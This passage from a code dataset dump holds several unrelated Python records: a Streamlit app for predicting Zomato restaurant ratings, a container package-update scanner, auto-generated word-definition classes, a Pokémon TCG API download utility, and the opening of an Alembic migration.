variables'):\r\n\t\t\t\t\tsource_dummy=pd.get_dummies(df[['location','rest_type','cuisines','type']],drop_first=True)\r\n\t\t\t\t\tdf=pd.concat([source_dummy,df],axis=1)\r\n\t\t\t\t\tdf.drop(['location','rest_type','cuisines','type'],inplace=True,axis=1)\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox(\"Apply log transfrom on cost and votes columns\"):\r\n\t\t\t\t\tdf['votes'] = df['votes'].replace(0, 1)\r\n\t\t\t\t\tdf['cost'] = np.log(df['cost'])\r\n\t\t\t\t\tdf['votes'] = np.log(df['votes'])\r\n\t\t\t\t\tst.write(df.head(10))\r\n\r\n\t\t\t\tif st.checkbox(\"Display shape\"):\r\n\t\t\t\t\tst.write(df.shape)\r\n\r\n\r\n\r\n\r\n\t\t# DEALING WITH THE MODEL BUILDING PART\r\n\r\n\t\telif option=='Model':\r\n\t\t\tst.subheader(\"Model Building\")\r\n\t\t\t# dumm=0\r\n\t\t\t\t\t\t\r\n\r\n\t\t\t\r\n\t\t\tif data is not None:\r\n\t\t\t\t# Data Preparation Phase\r\n\t\t\t\tdf=pd.read_csv(data)\r\n\t\t\t\tdf['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t\t\tdf.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t\t\tdf.dropna(how='any',inplace=True)\r\n\t\t\t\tdf = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t\t\tdf['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t\t\tdf['cost'] = df['cost'].astype(float)\r\n\t\t\t\tdf = df.loc[df.rate !='NEW']\r\n\t\t\t\tdf = df.loc[df.rate !='-']\r\n\t\t\t\tdf['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t\t\tdf['rate'] = df['rate'].astype(float)\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t\t\tdigits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t\t\tdf = df[digits_in_review['reviews_list'] == True]\r\n\t\t\t\tdf['reviews_list'] = df['reviews_list'].astype(float)\r\n\t\t\t\t# Feature Scaling\r\n\t\t\t\tdf.online_order[df.online_order == 'Yes'] = 1\r\n\t\t\t\tdf.online_order[df.online_order == 'No'] = 0\r\n\t\t\t\tdf.online_order = pd.to_numeric(df.online_order)\r\n\t\t\t\tdf.book_table[df.book_table == 'Yes'] = 1 \r\n\t\t\t\tdf.book_table[df.book_table == 'No'] = 0\r\n\t\t\t\tdf.book_table = pd.to_numeric(df.book_table)\r\n\t\t\t\ttop_20_location = df['location'].value_counts()[:20]\r\n\t\t\t\tdf['location'] = 
df['location'].apply(lambda x: x if x in top_20_location.index else 'other_location')\r\n\t\t\t\ttop_10_rest_type = df['rest_type'].value_counts()[:10]\r\n\t\t\t\tdf['rest_type'] = df['rest_type'].apply(lambda x: x if x in top_10_rest_type.index else 'other_rest_type')\r\n\t\t\t\ttop_15_cuisines= df['cuisines'].value_counts()[:15]\r\n\t\t\t\tdf['cuisines'] = df['cuisines'].apply(lambda x: x if x in top_15_cuisines.index else 'other_cuisines')\r\n\t\t\t\tdf.drop(['name','menu_item','dish_liked','city'],axis=1,inplace = True)\r\n\t\t\t\tsource_dummy=pd.get_dummies(df[['location','rest_type','cuisines','type']],drop_first=True)\r\n\t\t\t\tdf=pd.concat([source_dummy,df],axis=1)\r\n\t\t\t\tdf.drop(['location','rest_type','cuisines','type'],inplace=True,axis=1)\r\n\t\t\t\tdf['votes'] = df['votes'].replace(0, 1)\r\n\t\t\t\tdf['cost'] = np.log(df['cost'])\r\n\t\t\t\tdf['votes'] = np.log(df['votes'])\r\n\r\n\r\n\t\t\t\tst.write(\"Showing top 50 records\")\r\n\r\n\t\t\t\tst.dataframe(df.head(50))\r\n\r\n\t\t\t\tif st.checkbox(\"Show Data Types\"):\r\n\t\t\t\t\tst.write(df.dtypes)\r\n\r\n\r\n\t\t\t\t\r\n\r\n\t\t\t\tX = df.drop(['rate'],axis =1)\r\n\t\t\t\ty = df['rate']\r\n\r\n\t\t\t\tseed=st.sidebar.slider('Seed',0,200)\r\n\r\n\t\t\t\tRegressor_Model=st.sidebar.selectbox('Select your Regressor Model:',('MultiLinear','Support Vector','DecisionTree','RandomForest','ExtraTree','GradientBoosting','XGBoost','Artificial Neural Network'))\r\n\r\n\t \r\n\t\t\t\t \r\n\r\n\r\n\t\t\t\tdef add_parameter(name_of_reg):\r\n\r\n\t\t\t\t\tparams=dict()\r\n\t\t\t\t\tif name_of_reg=='RandomForest' or name_of_reg=='ExtraTree' :\r\n\r\n\t\t\t\t\t\tn=st.sidebar.slider('Select number of trees',10, 300,100)\r\n\t\t\t\t\t\tparams['n_estimators']=n\r\n\r\n\t\t\t\t\telif name_of_reg=='Artificial Neural Network':\r\n\r\n\t\t\t\t\t\tepochs=st.sidebar.slider('epochs',25,200,100)\r\n\t\t\t\t\t\tparams['epochs']=epochs\r\n\r\n\t\t\t\t\telif name_of_reg=='Support Vector':\r\n\t\t\t\t\t\tkernel = st.sidebar.selectbox('Select Kernel:',('rbf','linear','poly'))\r\n\t\t\t\t\t\tparams['kernel']=kernel\r\n\r\n\t\t\t\t\treturn params\r\n\r\n\t\t\t\t#calling the function\r\n\r\n\t\t\t\tparams=add_parameter(Regressor_Model)\r\n\r\n\t\t\t\tX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.3, random_state=seed)\r\n\r\n\t\t\t\t#defing a function for our classifier\r\n\r\n\t\t\t\tdef get_classifier(name_of_reg,params):\r\n\t\t\t\t\treg= None\r\n\r\n\t\t\t\t\tif name_of_reg == 'MultiLinear':\r\n\t\t\t\t\t\treg = LinearRegression()\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='Support Vector':\r\n\t\t\t\t\t\treg=SVR(kernel = params['kernel'])\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='DecisionTree':\r\n\t\t\t\t\t\treg=DecisionTreeRegressor(random_state = 0)\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='RandomForest':\r\n\t\t\t\t\t\treg=RandomForestRegressor(n_estimators=params['n_estimators'],random_state=0,min_samples_leaf=.0001)\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='ExtraTree':\r\n\t\t\t\t\t\treg=ExtraTreesRegressor(n_estimators = params['n_estimators'])\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='GradientBoosting':\r\n\t\t\t\t\t\treg=GradientBoostingRegressor(random_state=0)\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='XGBoost':\r\n\t\t\t\t\t\treg = XGBRegressor()\r\n\t\t\t\t\t\treg.fit(X_train,y_train)\r\n\t\t\t\t\telif name_of_reg=='Artificial Neural 
Network':\r\n\t\t\t\t\t\treg = tf.keras.models.Sequential()\r\n\t\t\t\t\t\treg.add(tf.keras.layers.Dense(units=60, activation='relu'))\r\n\t\t\t\t\t\treg.add(tf.keras.layers.Dense(units=60, activation='relu'))\r\n\t\t\t\t\t\treg.add(tf.keras.layers.Dense(units=1))\r\n\t\t\t\t\t\treg.compile(optimizer = 'adam', loss = 'mean_squared_error')\r\n\t\t\t\t\t\treg.fit(X_train, y_train, batch_size = 32, epochs = params['epochs'])\r\n\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tst.warning('Select your choice of algorithm')\r\n\r\n\t\t\t\t\treturn reg\r\n\r\n\t\t\t\treg=get_classifier(Regressor_Model,params)\r\n\r\n\t\t\t\ty_pred=reg.predict(X_test)\r\n\t\t\t\taccuracy=r2_score(y_test,y_pred)\r\n\r\n\t\t\t\tst.write('Name of Regressor Model:',Regressor_Model)\r\n\t\t\t\tst.write('Accuracy',accuracy)\r\n\r\n\r\n\r\n\r\n\telif option=='Predict Rating':\r\n\t\t# data = None\r\n\t\t# st.subheader(\"Predict Rating\")\r\n\r\n\t\thtml_temp = \"\"\"\r\n\t\t
<div style=\"background-color:tomato;padding:10px\">\r\n\t\t
<h2 style=\"color:white;text-align:center;\">Streamlit Zomato Restaurant Rating ML App</h2>\r\n\t\t
</div>
\r\n\t\t\"\"\"\r\n\t\tst.markdown(html_temp,unsafe_allow_html=True)\r\n\t\tst.text(\"\")\r\n\t\timage = Image.open('Zomato_1.jpg')\r\n\t\tst.image(image,use_column_width=True)\r\n\t\t\t\t\r\n\t\t\r\n\t\t# df=pd.read_csv('zomato.csv')\r\n\t\t# df['dish_liked'] = df['dish_liked'].replace(np.nan, 'not_available', regex=True)\r\n\t\t# df.drop(['url','phone','address'],axis=1,inplace= True)\r\n\t\t# df.dropna(how='any',inplace=True)\r\n\t\t# df = df.rename(columns={'approx_cost(for two people)':'cost','listed_in(type)':'type','listed_in(city)':'city'})\r\n\t\t# df['cost'] = df['cost'].apply(lambda x: x.replace(',',''))\r\n\t\t# df['cost'] = df['cost'].astype(float)\r\n\t\t# df = df.loc[df.rate !='NEW']\r\n\t\t# df = df.loc[df.rate !='-']\r\n\t\t# df['rate'] = df['rate'].apply(lambda x: x.replace('/5',''))\r\n\t\t# df['rate'] = df['rate'].astype(float)\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x.split(',')[0])\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x.split('Rated'))\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x[-1])\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x.replace('\\'',''))\r\n\t\t# df['reviews_list'] = df['reviews_list'].apply(lambda x : x.strip())\r\n\t\t# digits_in_review= pd.DataFrame(df['reviews_list'].str.replace('.','').str.isdigit()) \r\n\t\t# df = df[digits_in_review['reviews_list'] == True]\r\n\t\t# df['reviews_list'] = df['reviews_list'].astype(float)\r\n\t\t# # Feature Scaling\r\n\t\t# df.online_order[df.online_order == 'Yes'] = 1\r\n\t\t# df.online_order[df.online_order == 'No'] = 0\r\n\t\t# df.online_order = pd.to_numeric(df.online_order)\r\n\t\t# df.book_table[df.book_table == 'Yes'] = 1 \r\n\t\t# df.book_table[df.book_table == 'No'] = 0\r\n\t\t# df.book_table = pd.to_numeric(df.book_table)\r\n\t\t# top_20_location = df['location'].value_counts()[:20]\r\n\t\t# df['location'] = df['location'].apply(lambda x: x if x in top_20_location.index else 'other_location')\r\n\t\t# top_10_rest_type = df['rest_type'].value_counts()[:10]\r\n\t\t# df['rest_type'] = df['rest_type'].apply(lambda x: x if x in top_10_rest_type.index else 'other_rest_type')\r\n\t\t# top_15_cuisines= df['cuisines'].value_counts()[:15]\r\n\t\t# df['cuisines'] = df['cuisines'].apply(lambda x: x if x in top_15_cuisines.index else 'other_cuisines')\r\n\t\t# df.drop(['name','menu_item','dish_liked','city'],axis=1,inplace = True)\r\n\t\t# service_types =df['type'].value_counts()\r\n\t\t# source_dummy=pd.get_dummies(df[['location','rest_type','cuisines','type']],drop_first=True)\r\n\t\t# df=pd.concat([source_dummy,df],axis=1)\r\n\t\t# df.drop(['location','rest_type','cuisines','type'],inplace=True,axis=1)\r\n\t\t# df['votes'] = df['votes'].replace(0, 1)\r\n\t\t# df['cost'] = np.log(df['cost'])\r\n\t\t# df['votes'] = np.log(df['votes'])\r\n\t\t# X = df.drop(['rate'],axis =1)\r\n\t\t# y = df['rate']\r\n\t\t# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state = 0)\r\n\r\n\r\n\t\t\r\n\t\tpickle_in = open(\"model.pkl\",\"rb\")\r\n\t\tregressor=pickle.load(pickle_in)\r\n\r\n\t\tcolumn_train = ['location_Banashankari', 'location_Bannerghatta Road',\r\n\t\t\t\t\t\t'location_Bellandur', 'location_Brigade Road',\r\n\t\t\t\t\t\t'location_Electronic City', 'location_HSR', 'location_Indiranagar',\r\n\t\t\t\t\t\t'location_JP Nagar', 'location_Jayanagar',\r\n\t\t\t\t\t\t'location_Koramangala 1st Block', 'location_Koramangala 4th Block',\r\n\t\t\t\t\t\t'location_Koramangala 5th Block', 
'location_Koramangala 6th Block',\r\n\t\t\t\t\t\t'location_Koramangala 7th Block', 'location_MG Road',\r\n\t\t\t\t\t\t'location_Marathahalli', 'location_Sarjapur Road', 'location_Ulsoor',\r\n\t\t\t\t\t\t'location_Whitefield', 'location_other_location', 'rest_type_Bar',\r\n\t\t\t\t\t\t'rest_type_Beverage Shop', 'rest_type_Cafe', 'rest_type_Casual Dining',\r\n\t\t\t\t\t\t'rest_type_Casual Dining, Bar', 'rest_type_Delivery',\r\n\t\t\t\t\t\t'rest_type_Dessert Parlor', 'rest_type_Quick Bites',\r\n\t\t\t\t\t\t'rest_type_Takeaway, Delivery', 'rest_type_other_rest_type',\r\n\t\t\t\t\t\t'cuisines_Bakery, Desserts', 'cuisines_Biryani', 'cuisines_Cafe',\r\n\t\t\t\t\t\t'cuisines_Chinese', 'cuisines_Chinese, North Indian',\r\n\t\t\t\t\t\t'cuisines_Desserts', 'cuisines_Fast Food',\r\n\t\t\t\t\t\t'cuisines_Ice Cream, Desserts', 'cuisines_Mithai, Street Food',\r\n\t\t\t\t\t\t'cuisines_North Indian', 'cuisines_North Indian, Chinese',\r\n\t\t\t\t\t\t'cuisines_North Indian, Chinese, Biryani', 'cuisines_South Indian',\r\n\t\t\t\t\t\t'cuisines_South Indian, North Indian, Chinese',\r\n\t\t\t\t\t\t'cuisines_other_cuisines', 'type_Cafes', 'type_Delivery',\r\n\t\t\t\t\t\t'type_Desserts', 'type_Dine-out', 'type_Drinks & nightlife',\r\n\t\t\t\t\t\t'type_Pubs and bars', 'online_order', 'book_table', 'votes', 'cost',\r\n\t\t\t\t\t\t'reviews_list']\r\n\r\n\r\n\r\n\r\n\r\n\t\tLocation=['BTM', 'Koramangala 5th Block', 'HSR', 'Indiranagar', 'JP Nagar',\r\n\t\t\t\t'Jayanagar', 'Whitefield', 'Marathahalli', 'Bannerghatta Road',\r\n\t\t\t\t'Brigade Road', 'Koramangala 7th Block', 'Koramangala 6th Block',\r\n\t\t\t\t'Bellandur', 'Sarjapur Road', 'Koramangala 1st Block',\r\n\t\t\t\t'Koramangala 4th Block', 'Ulsoor', 'Electronic City', 'MG Road',\r\n\t\t\t\t'Banashankari']\r\n\t\tLocation.append('other_location')\r\n\t\tLocation=st.selectbox('Select Location:',Location)\r\n\r\n\t\tRest_type = ['Quick Bites', 'Casual Dining', 'Cafe', 'Dessert Parlor', 'Delivery',\r\n\t\t\t\t\t'Takeaway, Delivery', 'Casual Dining, Bar', 'Bakery', 'Beverage Shop',\r\n\t\t\t\t\t'Bar']\r\n\t\tRest_type.append('other_rest_type')\r\n\t\tRest_type = st.selectbox('Select Restaurant Type:',Rest_type)\r\n\r\n\t\tCuisines = ['North Indian', 'North Indian, Chinese', 'South Indian',\r\n\t\t\t\t\t'Bakery, Desserts', 'Cafe', 'South Indian, North Indian, Chinese',\r\n\t\t\t\t\t'Desserts', 'Biryani', 'Fast Food', 'Chinese', 'Ice Cream, Desserts',\r\n\t\t\t\t\t'Bakery', 'Chinese, North Indian', 'Mithai, Street Food',\r\n\t\t\t\t\t'North Indian, Chinese, Biryani']\r\n\t\tCuisines.append('other_cuisines')\r\n\t\tCuisines = st.selectbox('Select cuisines :',Cuisines)\r\n\r\n\t\tService_type = ['Delivery', 'Dine-out', 'Desserts', 'Cafes', 'Drinks & nightlife',\r\n\t\t\t\t\t\t'Buffet', 'Pubs and bars']\r\n\t\tService_type = st.selectbox('Select service type :',Service_type)\r\n\r\n\t\tOnline_order = ['Yes','No']\r\n\t\tOnline_order = st.selectbox('Select online order available :',Online_order)\r\n\r\n\t\tBook_table = ['Yes','No']\r\n\t\tBook_table = st.selectbox('Select book table available :',Book_table)\r\n\r\n\r\n\t\tReviews_list= [1.0,1.5,2.0,2.5,3.0,3.5,4.0,4.5,5.0]\r\n\t\tReviews_list = st.selectbox(\"Rating given by user:\",Reviews_list)\r\n\r\n\r\n\t\tVotes = st.text_input(\"Total Votes given:(Please enter votes e.g 700)\",700)\r\n\t\t\r\n\t\tCost = st.text_input(\"Approximate cost for two people:(Please enter price e.g 800)\",800)\r\n\r\n\r\n\t\t# INPUT \r\n\r\n\t\t#Location\r\n\r\n\t\tlocations_train_column = column_train[:20]\r\n\t\tlocations_input 
=[0]*20\r\n\t\tlocations_column = []\r\n\t\tfor location in locations_train_column:\r\n\r\n\t\t\tnew_location = location.replace(\"location_\",\"\")\r\n\t\t\tlocations_column.append(new_location)\r\n\r\n\t\tfor i in range(20):\r\n\t\t\tif locations_column[i]==Location:\r\n\t\t\t\tlocations_input[i] =1\r\n\r\n\t\t#Rest_type\r\n\t\trest_type_train_column = column_train[20:30]\r\n\t\trest_type_input =[0]*10\r\n\t\trest_type_column = []\r\n\t\tfor rest_type in rest_type_train_column:\r\n\t\t\tnew_rest_type = rest_type.replace(\"rest_type_\",\"\")\r\n\t\t\trest_type_column.append(new_rest_type)\r\n\t\tfor i in range(10):\r\n\t\t\tif rest_type_column[i]==Rest_type:\r\n\t\t\t\trest_type_input[i] =1\r\n\r\n\t\t# cuisines\r\n\t\tcuisines_train_column = column_train[30:45]\r\n\t\tcuisines_input =[0]*15\r\n\t\tcuisines_column = []\r\n\t\tfor cuisines in cuisines_train_column:\r\n\t\t\tnew_cuisines = cuisines.replace(\"cuisines_\",\"\")\r\n\t\t\tcuisines_column.append(new_cuisines)\r\n\t\tfor i in range(15):\r\n\t\t\tif cuisines_column[i]==Cuisines:\r\n\t\t\t\tcuisines_input[i]=1\r\n\r\n\t\t## Service_type\r\n\t\tservice_type_train_column = column_train[45:51]\r\n\t\tservice_type_input =[0]*6\r\n\t\tservice_type_column = []\r\n\t\tfor service_type in service_type_train_column:\r\n\t\t\tnew_service_type = service_type.replace(\"type_\",\"\")\r\n\t\t\tservice_type_column.append(new_service_type)\r\n\t\tfor i in range(6):\r\n\t\t\tif service_type_column[i]==Service_type:\r\n\t\t\t\tservice_type_input[i]=1\r\n\r\n\t\t#online_order\r\n\t\tonline_order_input = []\r\n\t\tif Online_order=='Yes':\r\n\t\t\tnew_online_order = 1\r\n\t\t\tonline_order_input.append(new_online_order)\r\n\t\telse:\r\n\t\t\tnew_online_order = 0\r\n\t\t\tonline_order_input.append(new_online_order)\r\n\r\n\t\t# book_table\r\n\t\tbook_table_input = []\r\n\t\tif Book_table=='Yes':\r\n\t\t\tnew_book_table = 1\r\n\t\t\tbook_table_input.append(new_book_table)\r\n\t\telse:\r\n\t\t\tnew_book_table = 0\r\n\t\t\tbook_table_input.append(new_book_table)\r\n\r\n\t\t# votes\r\n\t\tvotes_input = [np.log(int(Votes))]\r\n\t\t# Cost\r\n\t\tcost_input = [np.log(float(Cost))]\r\n\t\t# reviews_list\r\n\t\treview_list_input = [Reviews_list]\r\n\r\n\r\n\t\tinput_vector = locations_input + rest_type_input + cuisines_input + service_type_input + online_order_input + book_table_input + votes_input + cost_input + review_list_input\r\n\r\n\t\tprediction=regressor.predict([input_vector])\r\n\r\n\t\tif st.button(\"Predict\"):\r\n\t\t\tst.success('Restaurant rating is {}'.format(round(prediction[0],2)))\r\n\r\n\r\n\r\n#DEALING WITH THE ABOUT US PAGE\r\n\r\n\r\n\r\n\r\n\telif option=='About us':\r\n\r\n\t\timage = Image.open('Zomato_1.jpg')\r\n\t\tst.image(image,use_column_width=True)\r\n\r\n\t\tst.markdown('''\r\n\t\t\t\r\n\r\n\t\t\tZomato is one of the best online food delivery apps, giving users ratings and reviews of restaurants all over India. These ratings and reviews are considered among the most important deciding factors in determining how good a restaurant is.\r\n\r\nWe will therefore use a real-time dataset with the various features a user would look into regarding a restaurant. 
We will be considering Bangalore city in this analysis.\r\n\r\nContent: The basic idea of analyzing the Zomato dataset is to get a fair idea of the factors affecting the establishment of different types of restaurants in different places in Bengaluru, and the aggregate rating of each restaurant. Bengaluru is one such city, with more than 12,000 restaurants serving dishes from all over the world.\r\n\r\nWith new restaurants opening every day, the industry hasn’t been saturated yet and the demand is increasing day by day. In spite of the increasing demand, however, it has become difficult for new restaurants to compete with established ones, most of them serving the same food. Bengaluru is the IT capital of India, and most people here depend mainly on restaurant food as they don’t have time to cook for themselves.\r\n\r\nWith such an overwhelming demand for restaurants, it has therefore become important to study the demography of a location. What kind of food is more popular in a locality? Does the entire locality love vegetarian food? If yes, is that locality populated by a particular community, e.g. Jains, Marwaris or Gujaratis, who are mostly vegetarian? This kind of analysis can be done using the data, by studying factors such as\r\n\r\n• Location of the restaurant\r\n• Approximate price of food\r\n• Theme-based restaurant or not\r\n• Which locality of the city serves a given cuisine with the maximum number of restaurants\r\n• The needs of people who are striving to get the best cuisine of the neighborhood\r\n• Whether a particular neighborhood is famous for its own kind of food.\r\n“Just so that you have a good meal the next time you step out”\r\n\r\nThe data is accurate to that available on the Zomato website until 15 March 2019. The data was scraped from Zomato in two phases. After going through the structure of the website I found that for each neighborhood there are 6-7 categories of restaurants, viz. Buffet, Cafes, Delivery, Desserts, Dine-out, Drinks & nightlife, and Pubs and bars.\r\n\r\nPhase I\r\n\r\nIn Phase I of extraction only the URL, name and address of each restaurant, as visible on the front page, were extracted. The URLs of the restaurants were recorded in a CSV file so that the data could later be extracted individually for each restaurant. This made the extraction process easier and reduced the extra load on my machine.\r\n\r\nPhase II\r\n\r\nIn Phase II the recorded data for each restaurant and each category was read, and the data for each restaurant was scraped individually. 15 variables were scraped in this phase: for each neighborhood and each category, online_order, book_table, rate, votes, phone, location, rest_type, dish_liked, cuisines, approx_cost (for two people), reviews_list and menu_item were extracted.\r\n\r\nAcknowledgements: The data was scraped entirely for educational purposes only. Note that I don’t claim any copyright for the data. All copyright for the data is owned by Zomato Media Pvt.
Ltd.\r\n\r\n Source: Kaggle\r\n \r\n '''\r\n\t\t\t)\r\n\r\n\r\n\t\tst.balloons()\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tmain() \r\n","sub_path":"ZomatoRating_2.py","file_name":"ZomatoRating_2.py","file_ext":"py","file_size_in_byte":33672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"179587511","text":"#!/usr/bin/python\n\"\"\"This class checks for updates from package managers other than RPM.\"\"\"\nimport os\n\nfrom container_pipeline.scanners.base import Scanner\n\n\nclass MiscPackageUpdates(Scanner):\n    \"\"\"Checks updates for packages other than RPM.\"\"\"\n\n    def __init__(self):\n        \"\"\"Set the scanner names and supported scan types.\"\"\"\n        self.scanner_name = \"misc-package-updates\"\n        self.full_scanner_name = \\\n            \"registry.centos.org/pipeline-images/misc-package-updates\"\n        self.scan_types = [\"pip-updates\", \"npm-updates\", \"gem-updates\"]\n\n    def scan(self, image_under_test):\n        \"\"\"Run the scanner.\"\"\"\n        # initializing a blank list that will contain results from all the\n        # scan types of this scanner\n        logs = []\n        super(MiscPackageUpdates, self).__init__(\n            image_under_test=image_under_test,\n            scanner_name=self.scanner_name,\n            full_scanner_name=self.full_scanner_name,\n            to_process_output=False\n        )\n\n        os.environ[\"IMAGE_NAME\"] = self.image_under_test\n\n        for _ in self.scan_types:\n            scan_cmd = [\n                \"atomic\",\n                \"scan\",\n                \"--scanner={}\".format(self.scanner_name),\n                \"--scan_type={}\".format(_),\n                \"{}\".format(image_under_test)\n            ]\n\n            scan_results = super(MiscPackageUpdates, self).scan(scan_cmd)\n\n            if not scan_results[0]:\n                return False, None\n\n            logs.append(scan_results[1])\n\n        return True, self.process_output(logs)\n\n    def process_output(self, logs):\n        \"\"\"\n        Generalise the output.\n\n        Processing data for this scanner is unlike other scanners\n        because we need to send logs of three different scan types\n        of the same atomic scanner, unlike other atomic scanners\n        which have only one, and hence default, scan type\n        \"\"\"\n        data = {}\n        data[\"scanner_name\"] = self.scanner_name\n        data[\"msg\"] = \"\"\n        for i in logs:\n            data[\"msg\"] += i[\"Summary\"]\n        data[\"logs\"] = logs\n\n        return data\n","sub_path":"container_pipeline/scanners/misc_package_updates.py","file_name":"misc_package_updates.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"67849937","text":"\n\nfrom xai.brain.wordbase.nouns._burger import _BURGER\n\n# class header\nclass _BURGERS(_BURGER, ):\n\tdef __init__(self,): \n\t\t_BURGER.__init__(self)\n\t\tself.name = \"BURGERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"burger\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_burgers.py","file_name":"_burgers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"125747882","text":"\n\n# class header\nclass _DEVICE():\n\tdef __init__(self,): \n\t\tself.name = \"DEVICE\"\n\t\tself.definitions = [u'an object or machine that has been invented for a particular purpose: ', u'a machine, for example a phone or computer, that can be used to connect to the internet: ', u'a method that is used to produce a particular effect: ', u'a bomb or other explosive: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], 
obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_device.py","file_name":"_device.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"465743222","text":"import requests\nimport pandas as pd\nimport os\n\napi_file = \"api-key/key\"\n\nbase_uri = \"https://api.pokemontcg.io/v2/\"\n\n\ndef get_file_contents(filename):\n \"\"\"Given a filename,\n return the contents of that file\n \"\"\"\n try:\n with open(filename, \"r\") as f:\n # It's assumed our file contains a single line,\n # with our API key\n return f.read().strip()\n except FileNotFoundError:\n print(\"'%s' file not found\" % filename)\n\n\nmy_key = get_file_contents(api_file)\nheaders = {\"X-Api-Key\": my_key}\n\n\ndef get_sets(query):\n \"\"\"queries the sets and stores a list of all sets\"\"\"\n params = {\"q\": query, \"orderBy\": \"releaseDate\"}\n endpoint = \"sets/\"\n url = base_uri + endpoint\n response = requests.get(url, params=params, headers=headers).json()[\"data\"]\n return response\n\n\ndef search_cards(query):\n \"\"\"returns a list of cards (as dicts) based on the query\"\"\"\n params = {\"q\": query, \"orderBy\": \"releaseDate\"}\n endpoint = \"cards/\"\n url = base_uri + endpoint\n response = requests.get(url, params=params, headers=headers).json()[\"data\"]\n return response\n\n\ndef save_search_to_pickle(items, filename):\n \"\"\"writes a search result list to data/filename.pickle\"\"\"\n df = pd.DataFrame(items)\n df.to_pickle(path=f\"data/{filename}.pickle\")\n\n\n# def download_cards(query, download_images=False):\n# \"\"\"takes a query, fetches card data, saves it as pickle, and fetches all the hi-res images\"\"\"\n# card_list = search_cards(query)\n# save_search_to_pickle(card_list, query[7:])\n# if download_images:\n# os.makedirs(f\"data/img/{query[7:]}\", exist_ok=True)\n# for card in card_list:\n# print(f\"{card['name']} is being downloaded.\")\n# r = requests.get(url=card[\"images\"][\"large\"], headers=headers)\n# open(f\"data/img/{query[7:]}/{card['id']}-{card['name']}.png\", \"wb\").write(\n# r.content\n# )\n\n\ndef download_cards(query, download_images=False):\n \"\"\"takes a query, fetches card data, saves it as pickle, and fetches all the hi-res images\"\"\"\n counter = 0\n card_list = search_cards(query)\n save_search_to_pickle(card_list, query[7:])\n if download_images:\n for card in card_list:\n if card[\"supertype\"] == \"Pokémon\":\n counter += 1\n print(counter)\n print(f\"{card['name']} is being downloaded.\")\n r = requests.get(url=card[\"images\"][\"large\"], headers=headers)\n try:\n pokémon_num = card[\"nationalPokedexNumbers\"][0]\n path = f\"data/img/per_pokemon/{pokémon_num}\"\n os.makedirs(path, exist_ok=True)\n open(f\"{path}/{card['id']}-{card['name']}.png\", \"wb\").write(\n r.content\n )\n except:\n print(f\"could not find pokemon number in {card['name']}\")\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386318744","text":"\"\"\"Profiles model\n\nRevision ID: 27953385e40d\nRevises: e53f3aa8b1c3\nCreate Date: 2020-05-01 23:34:36.463006\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '27953385e40d'\ndown_revision = 'e53f3aa8b1c3'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please 
